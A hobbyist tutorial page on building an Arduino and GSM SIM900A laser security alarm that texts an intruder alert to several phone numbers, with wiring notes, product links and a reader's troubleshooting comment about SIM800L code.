        {
            printf(" %d,", vig2[i][j]);
        }
        printf(" \n");
    }
}
Also I couldn't remember how to pass the array to the function without having to assign the pointer to a new array :
vig1=&vig2[MAX][MAX];
I didn't think you had to do this but can't get it to pass in any other way.
Thanks for your time.
Craig | https://www.daniweb.com/programming/software-development/threads/62571/nice-easy-one-for-you-all-passing-arrays-to-functions-in-c | CC-MAIN-2017-09 | refinedweb | 254 | 66.88 |
Python web crawler - Fundamentals (1)
2022-01-30 19:03:43 【FizzH】
「This post is part of my participation in the November Gengwen Challenge. For the event details, see: The Last Gengwen Challenge of 2021」
Basic principles of web crawlers
1. Web page request process
(1) Request: every web page displayed in front of us must go through this step, that is, sending an access request to the server. In Python, you need to import the requests module:
import requests
(2) Response: after the server receives the user's request, it verifies the validity of the request and then sends the response content to the user. The user receives the server's response content and displays it. This is the familiar web request.
2. Ways of requesting a web page
(1) GET: the most common way, generally used to obtain or query resource information; the parameters are set in the URL.
(2) POST: passes parameters via the request body, and can send much more information in a request than GET.
2.1 Using GET to fetch data
The following uses GET to try to fetch the Nuggets (Juejin) home page. The code is as follows:
import requests

url = ''
strhtml = requests.get(url)
print(strhtml.text)
The results are as follows:
A follow-up article will cover the relevant HTML background.
2.2 Using POST to fetch data
Still on the Nuggets home page, press F12 to enter developer mode and click the "Network" tab.
Well, that did not pan out, so instead of the Nuggets home page let's find a translation website to try.
Search for "nuggets" on the translation website; as pictured, you can see that the request method is POST.
First, copy the URL from the Headers section and assign it to url. The code is as follows:
url = ""
POST requests data differently from GET: GET can pass parameters through the URL, while POST parameters need to be placed in the request body.
Turn the Form Data into a dictionary of request parameters, then use the requests.post() method to request the form data. The code is as follows.
import requests

response = requests.post(url, data = Form_data)
Convert the string-format data to JSON-format data, extract the data according to its structure, and print out the translation result. The code is as follows.
import json

content = json.loads(response.text)
print(content['translateResult'][0][0]['tgt'])
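The extraction step can be exercised offline by standing in for response.text with a literal string; the nested-list shape below simply mirrors the translateResult structure used above (the real service returns more fields):

```python
import json

# Stand-in for response.text; the nested-list shape mirrors translateResult above.
fake_response_text = '{"translateResult": [[{"src": "nuggets", "tgt": "掘金"}]]}'

content = json.loads(fake_response_text)
translation = content['translateResult'][0][0]['tgt']
print(translation)  # 掘金
```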
That covers web page requests and responses. If you have a better way, please share!
Author: FizzH
/*PS: This topic has something to do with Java graphics as well*/
Hi,
I'm working on a star map (graphics program), the final output of the program is similar to:
These are the steps I follow:
Step 1
Write a method to convert from the star coordinate system to the Java picture coordinate system.
The star coordinate system has (0,0) in the center, and −1 and 1 as the extremes.
The Java graphics coordinate system has (0,0) as the top-left corner, and positive numbers extend down and right up to the screen size.
(diagram: the two coordinate systems)
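For step 1, the conversion is a pair of linear maps, flipping y because Java's y axis grows downward. A sketch along these lines (the class name, method names and window size here are my own, not from the assignment):

```java
public class StarCoords {
    // Star x in [-1, 1] -> pixel column in [0, width].
    public static double toPixelX(double starX, double width) {
        return (starX + 1.0) / 2.0 * width;
    }

    // Star y in [-1, 1] -> pixel row in [0, height], flipped
    // because Java's y coordinate grows downward.
    public static double toPixelY(double starY, double height) {
        return (1.0 - starY) / 2.0 * height;
    }

    public static void main(String[] args) {
        // The center of the star system lands in the middle of a 500x500 window.
        System.out.println(toPixelX(0, 500) + ", " + toPixelY(0, 500));  // 250.0, 250.0
        // The star-system corner (-1, 1) maps to the Java corner (0, 0).
        System.out.println(toPixelX(-1, 500) + ", " + toPixelY(1, 500)); // 0.0, 0.0
    }
}
```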
Step 2
Read the contents of the star-data.txt file, and plot the stars on a Java graphics window. Use a black background, and plot the stars as white circles.
Step 3
star-data.txt contains info on 3,526 stars, this number appears on the first line of the file.
Subsequent lines have the following fields:
-x, y coordinates for stars (in star coordinate system, e.g. 0.512379, 0.020508)
- Henry Draper number (just a unique identifier for the star)
-magnitude (or brightness of star)
-names of some stars. A star may have several names.
Vary the size of the circles to reflect their magnitude. Since brighter stars have smaller magnitude values, you will need to calculate the circle radius, say, 10/(magnitude + 2).
Step 4
Read from all files in constellation folder, and plot them on top of the stars.
Each file contains pairs of star names that make up lines in the constellation.
I have already done Steps 1 - 3.
I'm using these files:
- StarApp.java, my application class that has the main() method
- StarJFrame.java, this class creates the window & defines its properties & behavior
- StarJPanel.java ---> here's the code for this class, below
- Star.java -----> here's the code for this class, below
Code :
StarJPanel.java

import java.awt.*;
import javax.swing.*;
import java.awt.event.*;
import java.util.Scanner;

public class StarJPanel extends JPanel implements ActionListener
{
    private Star[] stars;
    private Timer timer;

    public StarJPanel()
    {
        setBackground(Color.black);
        timer = new Timer(5, this);
        stars = getArrayOfStars();
        timer.start();
    }

    private Star[] getArrayOfStars()
    {
        // This method reads the Stars data from a file and stores it in the stars array.
        int howMany = Integer.parseInt(Keyboard.readInput());
        Star[] stars = new Star[howMany];
        for (int i = 0; i < stars.length; i++)
        {
            String input = Keyboard.readInput();
            Scanner fields = new Scanner(input);
            double x = Double.parseDouble(fields.next());
            double y = Double.parseDouble(fields.next());
            int draper = Integer.parseInt(fields.next());
            double magnitude = Double.parseDouble(fields.next());
            String namesString = "";
            String[] names = {};
            if (fields.hasNext())
            {
                namesString = fields.nextLine();
                names = namesString.trim().split("; ");
            }
            stars[i] = new Star(x, y, draper, magnitude, names);
        }
        return stars;
    }

    public void actionPerformed(ActionEvent e)
    {
        repaint();
    }

    public void paintComponent(Graphics g)
    {
        super.paintComponent(g);
        for (int i = 0; i < stars.length; i++)
        {
            stars[i].coordinateToPixel(stars[i].getX(), stars[i].getY());
            stars[i].drawStar(g);
        }
    }
}
Code :
Star.java

import java.awt.*;
import javax.swing.*;

public class Star
{
    private double x, y;        // coordinates of star
    private int draper;         // Henry Draper number (unique identifier)
    private double magnitude;   // Magnitude (brightness) of star
    private String[] names;     // Star name(s) - not always present
    private int newX;
    private int newY;
    private int size;

    public Star(double x, double y, int draper, double magnitude, String[] names)
    {
        this.x = x;
        this.y = y;
        this.draper = draper;
        this.magnitude = magnitude;
        this.names = names;
        size = (int)(10 / (magnitude + 2));
    }

    public void coordinateToPixel(double x, double y)
    {
        newX = (int)((x + 1) * 350);
        newY = (int)((y - 1) * -350);
    }

    public void drawStar(Graphics g)
    {
        g.setColor(Color.white);
        g.drawOval(newX, newY, size, size);
    }

    public int getNumberOfNames()
    {
        return names.length;
    }

    public double getX()
    {
        return x;
    }

    public double getY()
    {
        return y;
    }
}
As you can see I have done:
Step 1: in Star class, with method: coordinateToPixel(double x, double y)
Step 2: in StarJPanel class with method: private Star[] getArrayOfStars()
(PS: I'm also using a Keyboard class to read lines from the star-data.txt file)
Step 3: in Star class, with method: drawStar(Graphics g), where size = (int)(10/(magnitude + 2));
Please tell me if I have done the 3 steps without confusing & incoherent code. I guess I have written the code differently from what people write; somehow that's how we were taught to write. For me, my way gets a bit confusing sometimes!!
Now I'm left stuck with Step 4.
I have a folder where all my StarApp, StarJPanel, etc files are & a folder called Constellation
Inside constellation folder I have files that contain pairs of star names that make up lines in the constellation.
--Here's the constellation folder & star-data.txt file:
Constellations & star-data.rar
Although I'm thinking I can use the code below to read the contents of the files & use g.drawLine somewhere in StarJPanel. But I'm not sure how to match the star names in the constellation files with the names in the already set array from star-data & then join the coordinates with g.drawLine???
Code :
import java.io.*;

public class reader
{
    public static void main(String args[]) throws Exception
    {
        FileReader fr = new FileReader("Constellation/...."); /** Don't know what to put in ....... **/
        BufferedReader br = new BufferedReader(fr);
        String s;
        while ((s = br.readLine()) != null)
        {
            System.out.println(s);
        }
        fr.close();
    }
}
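Right now my rough idea for the matching part looks something like this (just a sketch, I haven't tested it; the Star class here is a cut-down stand-in with only the fields the sketch needs):

```java
// Sketch: look each named star up in the stars array, then the two
// matches give the endpoints for one g.drawLine call.
public class ConstellationSketch
{
    // Minimal stand-in for Star -- only the fields this sketch needs.
    static class Star
    {
        String[] names;
        int newX, newY;

        Star(String[] names, int newX, int newY)
        {
            this.names = names;
            this.newX = newX;
            this.newY = newY;
        }
    }

    // Return the star whose name list contains the given name, or null.
    static Star findStar(Star[] stars, String name)
    {
        for (Star s : stars)
        {
            for (String n : s.names)
            {
                if (n.equals(name))
                {
                    return s;
                }
            }
        }
        return null;
    }

    // In paintComponent, after plotting the stars, each pair of names
    // read from a constellation file would become one line:
    //   Star a = findStar(stars, name1);
    //   Star b = findStar(stars, name2);
    //   if (a != null && b != null)
    //       g.drawLine(a.newX, a.newY, b.newX, b.newY);
    public static void main(String[] args)
    {
        Star[] stars = {
            new Star(new String[]{"DUBHE", "ALPHA UMA"}, 10, 20),
            new Star(new String[]{"MERAK"}, 30, 40)
        };
        Star m = findStar(stars, "MERAK");
        System.out.println(m.newX + "," + m.newY);   // prints 30,40
    }
}
```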
Not sure how Step 4 is done please guide me. :)
By the way, I'm using TextPad as my editor & compiler.
So I have to go: Tools > Run, and in parameters I put: StarApp < star-data.txt in order to load the stars onto the screen.
Servlets are one of the most popular ways to develop Web applications today. Many of the best-known Web sites on the Internet are powered by servlets. In this chapter, I give you just the basics: what a servlet is, how to set up your computer so you can code and test servlets, and how to create a simple servlet. The next two chapters build on this chapter with additional Web programming techniques.

In a normal Web interaction, a Web browser uses a URL to request a document that's located on the server computer. HTTP uses a request/response model, which means that client computers (Web users) send request messages to HTTP servers, which in turn send response messages back to the clients.
A basic HTTP interaction works something like this:

1. The user enters a URL into the browser's address bar or clicks a link that specifies a URL. In some cases, you actually type in the URL. But most of the time, you click a link that specifies the URL.

2. The browser sends an HTTP request to the server. The request includes the name of the file that you want to retrieve.

3. The server receives the request, locates the file named in the request, and sends the file's contents back to the browser in an HTTP response.

4. The browser receives the file and displays it.
The most important thing to note about normal Web interactions is that they are static. By that I mean that the contents of the file sent to the user is always the same. If the user requests the same file 20 times in a row, the same page displays 20 times.
In contrast, a servlet provides a way for the content to be dynamic. A servlet is simply a Java program that extends the javax.servlet.Servlet class. The Servlet class enables the program to run on a Web server in response to a user request, and output from the servlet is sent back to the Web user as an HTML page.
With servlets, Steps 1, 2, and 4 of the preceding procedure are the same. It's the fateful third step that sets servlets apart. If the URL specified by the user refers to a servlet rather than a file, Step 3 goes more like this: the server runs the servlet, and whatever output the servlet generates is sent back to the browser in the HTTP response.

In other words, instead of sending the contents of a file, the server sends the output generated by the servlet program. Typically, the servlet program generates some HTML that's displayed by the browser.
Servlets are designed to get their work done quickly, and then end. Each time a servlet runs, it processes one request from a browser, generates one page that's sent back to the browser, and then ends. The next time that user or any other user requests the same servlet, the servlet is run again.
Unfortunately, you can't just compile a servlet and run it the way you run an ordinary Java program; servlets must run inside a servlet engine. The following paragraphs describe how to download, install, and configure the free servlet engine Apache Tomcat:
You find the Zip file on the Apache Web site. Although Apache also offers an executable setup file for installing Tomcat, I suggest you download the Zip file instead and extract its contents to c:\tomcat. Then copy the file servlet-api.jar into the jre\lib\ext folder of your JDK.

For example, if your JDK is installed in c:\Program Files\Java\jdk1.6.0, copy this file to c:\Program Files\Java\jdk1.6.0\jre\lib\ext. You find the servlet-api.jar file in c:\tomcat\common\lib, assuming you extracted the Tomcat files to c:\tomcat.
The context.xml file is located in c:\tomcat\conf. The second line is initially this:

<Context>

Change it to:

<Context reloadable="true" privileged="true">
Like context.xml, the web.xml file is located in c:\tomcat\conf. In this file, you must uncomment two groups of lines that enable the invoker servlet, which lets you run a servlet by specifying its class name in the URL. The first group defines the invoker servlet and looks something like this:

<!--
    <servlet>
        <servlet-name>invoker</servlet-name>
        <servlet-class>
            org.apache.catalina.servlets.InvokerServlet
        </servlet-class>
    </servlet>
-->

Simply remove the first (<!--) and last (-->) of these lines so they aren't treated as comments.

The second group maps the invoker servlet to URLs that begin with /servlet/ and looks something like this:

<!--
    <servlet-mapping>
        <servlet-name>invoker</servlet-name>
        <url-pattern>/servlet/*</url-pattern>
    </servlet-mapping>
-->

Once again, you must remove the first and last lines so these lines aren't treated as comments.
By default, Tomcat looks for the class files for your servlets in the directory c:\tomcat\webapps\ROOT\WEB-INF\classes. Unfortunately, the classes directory is missing. So you must navigate to c:\tomcat\webapps\ROOT\WEB-INF and create the classes directory. (Of course, the c:\tomcat part of these paths varies if you installed Tomcat in some other location.)
After you install and configure Tomcat, you can start it by opening a command window, changing to the c:\tomcat\bin directory, and running the startup command. To stop Tomcat, run the shutdown command from the same directory.
Okay, enough of the configuration stuff; now you can start writing some code. The following sections go over the basics of creating a simple Hello, World! type servlet.
Most servlets need access to at least three packages-javax.servlet, javax.servlet.http, and java.io. As a result, you usually start with these import statements:
import java.io.*;
import javax.servlet.*;
import javax.servlet.http.*;
Depending on what other processing your servlet does, you may need additional import statements.
To create a servlet, you write a class that extends the HttpServlet class. Table 2-1 lists six methods you can override in your servlet class.
Most servlets override at least the doGet method. This method is called by the servlet engine when a user requests the servlet by typing its address into the browser's address bar or by clicking a link that leads to the servlet.
Two parameters are passed to the doGet method:
One of the main jobs of most servlets is writing HTML output that's sent back to the user's browser. To do that, you first call the getWriter method of the HttpServletResponse class. This returns a PrintWriter object that's connected to the response object. Thus you can use the familiar print and println methods to write HTML text.
For example, here's a doGet method for a simple HelloWorld servlet:
public void doGet(HttpServletRequest request,
    HttpServletResponse response)
    throws IOException, ServletException
{
    PrintWriter out = response.getWriter();
    out.println("Hello, World!");
}
Here the PrintWriter object returned by response.getWriter() is used to send a simple text string back to the browser. If you run this servlet, the browser displays the text Hello, World!.
In most cases, you don't want to send simple text back to the browser. Instead, you want to send formatted HTML. To do that, you must first tell the response object that the output is in HTML format. You can do that by calling the setContentType method, passing the string “text/html” as the parameter. Then you can use the PrintWriter object to send HTML. For example, Listing 2-1 shows a basic HelloWorld servlet that sends an HTML response.
Listing 2-1: The HelloWorld Servlet
import java.io.*;
import javax.servlet.*;
import javax.servlet.http.*;
import java.util.*;

public class HelloWorld extends HttpServlet
{
    public void doGet(HttpServletRequest request,
        HttpServletResponse response)
        throws IOException, ServletException
    {
        response.setContentType("text/html");
        PrintWriter out = response.getWriter();
        out.println("<html>");
        out.println("<head>");
        out.println("<title>HelloWorld</title>");
        out.println("</head>");
        out.println("<body>");
        out.println("<h1>Hello, World!</h1>");
        out.println("</body>");
        out.println("</html>");
    }
}
Here the following HTML is sent to the browser (I added indentation to show the HTML's structure):

<html>
    <head>
        <title>HelloWorld</title>
    </head>
    <body>
        <h1>Hello, World!</h1>
    </body>
</html>
When run, the HelloWorld servlet produces the page shown in Figure 2-3.
Figure 2-3: The HelloWorld servlet displayed in a browser.
So how exactly do you run a servlet? First, you must move the compiled class file into a directory that Tomcat can run the servlet from. For testing purposes, you can move the servlet's class file to c:\tomcat\webapps\ROOT\WEB-INF\classes. Then type an address like this one in your browser's address bar:

http://localhost:8080/servlet/HelloWorld
You may also want to override the doPost method. This method is called if the user requests your servlet from a form. In many cases, you'll just call doGet from the doPost method, so that both get and post requests are processed in the same way.
As you know, the doGet method is called whenever the user enters the address of your servlet in the address bar or clicks a link that leads to your servlet. But many-if not most-servlets are associated with HTML forms, which provide fields the user can enter data into. The normal way to send form data from the browser to the server is with an HTTP POST request, not a GET request.
If you want a servlet to respond to POST requests, you can override the doPost method instead of, or in addition to, the doGet method. Other than the method name, doPost has the same signature as doGet. In fact, it's not uncommon to see servlets in which the doPost method simply calls doGet, so that both POST and GET requests are processed identically. To do that, code the doPost method like this:
public void doPost(HttpServletRequest request,
    HttpServletResponse response)
    throws IOException, ServletException
{
    doGet(request, response);
}
The HelloWorld servlet that is shown earlier in Listing 2-1 isn't very interesting because it always sends the same text. Essentially, it's a static servlet-which pretty much defeats the purpose of using servlets in the first place. You could just as easily have provided a static HTML page.
Listing 2-2 shows the code for a more dynamic HelloWorld servlet. This version randomly displays one of six different greetings. It uses the random method of the Math class to pick a random number from 1 to 6, and then uses this number to decide which greeting to display. It also overrides the doPost method as well as the doGet method, so posts and gets are handled identically.
Listing 2-2: The HelloServlet Servlet
import java.io.*;
import javax.servlet.*;
import javax.servlet.http.*;
import java.util.*;

public class HelloServlet extends HttpServlet
{
    public void doGet(HttpServletRequest request,
        HttpServletResponse response)
        throws IOException, ServletException
    {
        response.setContentType("text/html");
        PrintWriter out = response.getWriter();
        String msg = getGreeting();
        out.println("<html>");
        out.println("<head>");
        out.println("<title>HelloWorld Servlet</title>");
        out.println("</head>");
        out.println("<body>");
        out.println("<h1>" + msg + "</h1>");
        out.println("</body>");
        out.println("</html>");
    }

    public void doPost(HttpServletRequest request,
        HttpServletResponse response)
        throws IOException, ServletException
    {
        doGet(request, response);
    }

    private String getGreeting()
    {
        String msg = "";
        int rand = (int)(Math.random() * (6)) + 1;
        switch (rand)
        {
            case 1: return "Hello, World!";
            case 2: return "Greetings!";
            case 3: return "Felicitations!";
            case 4: return "Yo, Dude!";
            case 5: return "Whasssuuuup?";
            case 6: return "Hark!";
        }
        return null;
    }
}
If a servlet is called by an HTTP GET or POST request that came from a form, you can call the getParameter method of the request object to get the values entered by the user into each form field. Here's an example:
String name = request.getParameter("name");
Here the value entered into the form input field named name is retrieved and assigned to the String variable name.
As you can see, retrieving data entered by the user in a servlet is easy. The hard part is creating a form that the user can enter the data into. There are two basic approaches to doing that. One is to create the form using a separate HTML file. For example, Listing 2-3 shows an HTML file named InputServlet.html that displays the form shown in Figure 2-4.
Figure 2-4: A simple input form.
Listing 2-3: The InputServlet.html File
<html>
    <head>
        <title>Input Servlet</title>
    </head>
    <body>
        <form action="/servlet/InputServlet" method="post">
            Enter your name:
            <input type="text" name="Name">
            <br>
            <input type="submit" value="Submit">
        </form>
    </body>
</html>
The action attribute in the form tag of this form specifies that /servlet/InputServlet is called when the form is submitted, and the method attribute indicates that the form is submitted via a POST rather than a GET request.
The form itself consists of an input text field named name and a Submit button. Nothing fancy-just enough to get some text from the user and send it to a servlet.
Listing 2-4 shows a servlet that can retrieve the data from the form shown in Listing 2-3.
Listing 2-4: The InputServlet Servlet
import java.io.*;
import javax.servlet.*;
import javax.servlet.http.*;

public class InputServlet extends HttpServlet
{
    public void doGet(HttpServletRequest request,
        HttpServletResponse response)
        throws IOException, ServletException
    {
        String name = request.getParameter("Name");
        response.setContentType("text/html");
        PrintWriter out = response.getWriter();
        out.println("<html>");
        out.println("<head>");
        out.println("<title>Input Servlet</title>");
        out.println("</head>");
        out.println("<body>");
        out.println("<h1>Hello " + name + "</h1>");
        out.println("</body>");
        out.println("</html>");
    }

    public void doPost(HttpServletRequest request,
        HttpServletResponse response)
        throws IOException, ServletException
    {
        doGet(request, response);
    }
}
As you can see, this servlet really isn't that much different than the first HelloWorld servlet from Listing 2-1. The biggest difference is that it retrieves the value entered by the user into the name field and uses it in the HTML that's sent to the response PrintWriter object. For example, if the user enters Calvin Coolidge into the name input field, the following HTML is generated:

<html>
    <head>
        <title>Input Servlet</title>
    </head>
    <body>
        <h1>Hello Calvin Coolidge</h1>
    </body>
</html>
Thus the message Hello Calvin Coolidge is displayed on the page.
Although real-life servlets do a lot more than just parrot back information entered by the user, most of them follow this surprisingly simple structure, with a few variations of course. For example, real-world servlets validate input data and display error messages if the user enters incorrect data or omits important data. And most real-world servlets retrieve or update data in files or databases. Even so, the basic structure is pretty much the same.
When you develop servlets, you often want to access other classes you've created, such as I/O classes that retrieve data from files or databases, utility or helper classes that provide common functions such as data validation, and perhaps even classes that represent business objects such as customers or products. To do that, all you have to do is save the class files in the classes directory of the servlet's home directory that, for the purposes of this chapter, is c:\tomcat\webapps\ROOT\WEB-INF\classes.
To illustrate a servlet that uses several classes, Figure 2-5 shows the output from a servlet that lists movies read from a text file. This servlet uses three classes:

- Movie: A class that represents a single movie, with title, year, and price fields (Listing 2-5)
- MovieIO: A class that reads the movie data from a text file (Listing 2-6)
- ListMovies: The servlet class itself (Listing 2-7)
Figure 2-5: The ListMovies servlet.
The code for the Movie class is shown in Listing 2-5. As you can see, this class doesn't have much: It defines three public fields (title, year, and price) and a constructor that lets you create a new Movie object and initialize the three fields. Note that the price field isn't used by this servlet.
Listing 2-5: The Movie Class
public class Movie
{
    public String title;
    public int year;
    public double price;

    public Movie(String title, int year, double price)
    {
        this.title = title;
        this.year = year;
        this.price = price;
    }
}
Listing 2-6 shows the MovieIO class. This class uses the file I/O features that are presented in Book VIII, Chapter 2 to read data from a text file. The text file uses tabs to separate the fields, and contains these lines:
It's a Wonderful Life → 1946 → 14.95
The Great Race → 1965 → 12.95
Young Frankenstein → 1974 → 16.95
The Return of the Pink Panther → 1975 → 11.95
Star Wars → 1977 → 17.95
The Princess Bride → 1987 → 16.95
Glory → 1989 → 14.95
Apollo 13 → 1995 → 19.95
The Game → 1997 → 14.95
The Lord of the Rings: The Fellowship of the Ring → 2001 → 19.95
Here the arrows represent tab characters in the file. I'm not going to go over the details of this class here, except to point out that getMovies is the only public method in the class, and it's static so you don't have to create an instance of the MovieIO class to use it. For the details on how this class works, refer to Book VIII, Chapter 2.
Listing 2-6: The MovieIO Class
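Since getMovies is the only public method, a minimal class along the same lines might look like this sketch. It is an illustration, not the book's listing: it takes a BufferedReader instead of opening the movies file directly, so the parsing is easy to test.

```java
// A sketch only: the real MovieIO reads the movies file itself,
// while this version parses whatever BufferedReader it's given.
import java.io.*;
import java.util.ArrayList;

public class MovieIOSketch
{
    // Minimal stand-in for the Movie class from Listing 2-5.
    public static class Movie
    {
        public String title;
        public int year;
        public double price;

        public Movie(String title, int year, double price)
        {
            this.title = title;
            this.year = year;
            this.price = price;
        }
    }

    // Reads tab-separated title/year/price lines and builds Movie objects.
    public static ArrayList<Movie> readMovies(BufferedReader in)
    {
        ArrayList<Movie> movies = new ArrayList<Movie>();
        try
        {
            String line;
            while ((line = in.readLine()) != null)
            {
                String[] fields = line.split("\t");
                movies.add(new Movie(fields[0],
                    Integer.parseInt(fields[1]),
                    Double.parseDouble(fields[2])));
            }
        }
        catch (IOException e)
        {
            System.out.println("I/O error: " + e.getMessage());
        }
        return movies;
    }

    public static void main(String[] args)
    {
        BufferedReader in = new BufferedReader(
            new StringReader("Star Wars\t1977\t17.95"));
        ArrayList<Movie> movies = readMovies(in);
        System.out.println(movies.get(0).year + ": " + movies.get(0).title);
        // prints 1977: Star Wars
    }
}
```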
Listing 2-7 shows the code for the ListMovies servlet class.
Listing 2-7: The ListMovie Servlet Class
import java.io.*;
import javax.servlet.*;
import javax.servlet.http.*;
import java.util.*;

public class ListMovies extends HttpServlet
{
    public void doGet(HttpServletRequest request,        // → 8
        HttpServletResponse response)
        throws IOException, ServletException
    {
        response.setContentType("text/html");
        PrintWriter out = response.getWriter();
        String msg = getMovieList();
        out.println("<html>");
        out.println("<head>");
        out.println("<title>List Movies Servlet</title>");
        out.println("</head>");
        out.println("<body>");
        out.println(msg);
        out.println("</body>");
        out.println("</html>");
    }

    public void doPost(HttpServletRequest request,       // → 28
        HttpServletResponse response)
        throws IOException, ServletException
    {
        doGet(request, response);
    }

    private String getMovieList()                        // → 35
    {
        String msg = "";
        ArrayList<Movie> movies = MovieIO.getMovies();
        for (Movie m : movies)
        {
            msg += m.year + ": ";
            msg += m.title + "<br>";
        }
        return msg;
    }
}
The following paragraphs describe what each of its methods do:
- doGet (the line marked → 8): Gets a PrintWriter for the response, calls getMovieList to build the list of movies, and writes the HTML page that displays the list.
- doPost (→ 28): Simply calls doGet, so GET and POST requests are processed identically.
- getMovieList (→ 35): Calls MovieIO.getMovies to read the movies from the file, and then builds a string in which each movie's year and title appear on a separate line.
Complete the steps described in the rest of this page, and in about fifteen minutes you'll have created a Google Chat bot that sends messages to a Google Chat room. This quickstart uses a simple Python script that sends HTTP requests to an incoming webhook registered to a Google Chat room.
Prerequisites
To run this quickstart, you need:
- Python 2.6 or greater.
- A Google account.
- An existing Google Chat room.
Run the following command to install the library using pip:
pip install httplib2
Python
from json import dumps
from httplib2 import Http

def main():
    """Hangouts Chat incoming webhook quickstart."""
    url = '<INCOMING-WEBHOOK-URL>'
    bot_message = {
        'text': 'Hello from a Python script!'}
    message_headers = {'Content-Type': 'application/json; charset=UTF-8'}
    http_obj = Http()
    response = http_obj.request(
        uri=url,
        method='POST',
        headers=message_headers,
        body=dumps(bot_message),
    )

if __name__ == '__main__':
    main()
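The same message can also be posted without Python, for example with curl (replace the placeholder with your webhook URL):

```shell
curl -X POST \
  -H 'Content-Type: application/json; charset=UTF-8' \
  -d '{"text": "Hello from curl!"}' \
  '<INCOMING-WEBHOOK-URL>'
```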
Description:
Arduino GSM Project: Security Alert message to multiple numbers. In this tutorial, you will learn how to make an advanced security system that sends a security alert message to multiple numbers using an Arduino and a GSM SIM900A module. For demonstration purposes, I will be using an LDR, which makes this project a laser security system, but if you want, you can also replace the LDR with a PIR sensor, a magnetic reed switch sensor, a limit switch, and so on. You can also use multiple sensors.
This is basically the 2nd version of the GSM laser security system, in which I used the LDR sensor for intruder detection and the same GSM SIM900A module. In that project, the security alert message is only sent to one number; you can watch that tutorial if you want.
But in many situations, we need to send the same security alert message to multiple numbers. So this tutorial is all about how to write a very simple program and how to connect all the components together to make the advanced security system. In this tutorial, we will cover
- GSM SIM900A module Pinout explanation
- Complete Circuit Diagram
- Arduino GSM project Programming and finally
- Testing
Without any further delay, let’s get started!!!
For the step-by-step explanation, watch the video tutorial given at the end.
Amazon Links.
Other Tools and Components:
Super Starter kit for Beginners
PCB small portable drill machines
*Please Note: These are affiliate links. I may make a commission if you buy the components through these links. I would appreciate your support in this way!
GSM SIM900A module pinout:
This is the GSM sim900A module. In the market we have different types of GSM modules; the one I will be using today is the GSM sim900A, but if you want, you can also use any other GSM module, for example the sim900D. I have tested the same programming using the sim900D but with a different baud rate; the rest of the program remains the same. If you want to study more about the GSM Sim900A module, then read my article “GSM sim900A Complete Guide“. To power up the GSM module, I will use a regulated power supply based on the lm317t adjustable variable voltage regulator; I have a very detailed tutorial on the lm317t explaining everything, in case you want to watch it.
As you can see clearly in the picture above, this module has so many pins, but for this project we will only need the Tx, Rx, GND, and power pins.

GSM Project Circuit Diagram:
This schematic is designed in Cadsoft Eagle version 9.1.0; if you want to learn how to make schematics and PCBs, then you can watch my tutorial.
The Tx of the sim900A is connected with pin number 7 of the Arduino, the Rx pin of the sim900A module is connected with pin number 8 of the Arduino, and GND is connected with the Arduino's ground. A power supply is connected with the sim900A module; the ideal voltage is 4.7v to 5v, as already explained.
An LDR is connected in series with a 10k resistor, which makes a voltage divider circuit. As you know, an LDR is basically a variable resistor whose resistance changes with the amount of light falling on it. So a change in resistance will result in a change in voltage. This change in voltage can be monitored using the analog pin A1 of the Arduino.
GSM Sim900A Module Interfacing with Arduino:
All the components are interfaced as per the circuit diagram, this is the LDR circuit, as you can see an LDR is connected in series with a 10k resistor. A wire from the middle of the LDR and 10k resistor is connected with the analog pin A1 of the Arduino.
The GSM sim900A module Txd and Rxd pins are connected with the Arduino pin number 7 and pin number 8, and make sure you connected the ground of the gsm module with the ground of the Arduino. This GSM module will be powered up using this Regulated 5v power supply. Now let’s discuss the Arduino Programming.
Arduino GSM Project Programming:
For the step-by-step program explanation, watch the video tutorial given at the end.
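As a rough sketch, the kind of program described in this tutorial might look like the following. This is an illustration, not the exact code from the video: the phone numbers, the LDR threshold, and the alert text are placeholders to replace, while the pin numbers follow the circuit diagram above.

```cpp
#include <SoftwareSerial.h>

SoftwareSerial sim900(7, 8);   // pin 7 = module Tx, pin 8 = module Rx

const int ldrPin = A1;         // LDR voltage divider output
const int threshold = 500;     // placeholder: tune for your laser/LDR setup

// Placeholder numbers: replace with the real ones.
String numbers[] = {"+92300xxxxxxx", "+92321xxxxxxx"};
const int totalNumbers = 2;

void sendSMS(String message, String number) {
  sim900.println("AT+CMGF=1");                  // text mode
  delay(1000);
  sim900.println("AT+CMGS=\"" + number + "\"");
  delay(1000);
  sim900.print(message);
  delay(100);
  sim900.write(26);                             // Ctrl+Z ends the message
  delay(5000);                                  // give the module time to send
}

void setup() {
  Serial.begin(9600);
  sim900.begin(9600);                           // sim900A baud rate
  pinMode(ldrPin, INPUT);
  delay(5000);                                  // let the module register on the network
}

void loop() {
  int light = analogRead(ldrPin);
  if (light < threshold) {                      // beam interrupted (flip the
    for (int i = 0; i < totalNumbers; i++) {    // comparison for your wiring)
      sendSMS("Intruder detected!", numbers[i]);
    }
    delay(10000);                               // avoid flooding with messages
  }
}
```

The loop simply repeats the same sendSMS call once per stored number, which is all that sending the alert to multiple numbers amounts to.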
Watch Video Tutorial:
Arduino GSM Project: How to send Security Alert message to multiple numbers using gsm module
Other GSM-based Projects:
How to use GSM and Bluetooth Together To monitor Any Sensors wirelessly using Arduino
RFID & GSM based student Attendance Alert message to parents
Request Temperature Data Using GSM and Arduino
Arduino and Gsm based laser security system
Car accident location tracking using GSM, GPS, and Arduino
GSM Alarm System Using Arduino and a PIR Sensor
Arduino Gas leakage detection and SMS alert MQ-2 sensor
RFID based students attendance system with message Alert
4 Comments
Hello 🙂
I need Your help.
I saw Your code about multiple sms send and I created this program code:
#define sensor 7
#include <SoftwareSerial.h>
SoftwareSerial SIM800(11, 12); // gsm module connected here
String textForSMS;
// cell numbers to which you want to send the security alert message
String f1001 = “+48694377xxx”;
String f1002 = “+48509168xxx”;
void setup() {
randomSeed(analogRead(0));
Serial.begin(9600);
SIM800.begin(9600); // original 19200. while enter 9600 for sim900A
Serial.println(” logging time completed!”);
pinMode(sensor, INPUT_PULLUP);
delay(5000); // wait for 5 seconds
}
void loop() {
{
textForSMS = “\nIntruder detected”;
//sendSMS(textForSMS);
sendsms(textForSMS, f1001); // you can use a variable of the type String
Serial.println(textForSMS);
Serial.println(“message sent.”);
delay(5000);
sendsms(“Intruder Detected!!!!!!!!!”, f1002); // you can also write any message that you want to send.
Serial.println(textForSMS);
Serial.println(“message sent.”);
delay(5000);
}
}
But it’s not working, please tell my why? I use module SIM800L:
On the serial port monitor, I see every command from the Arduino program.
Please help me with this, and answer by email 🙂
Thank You very much.
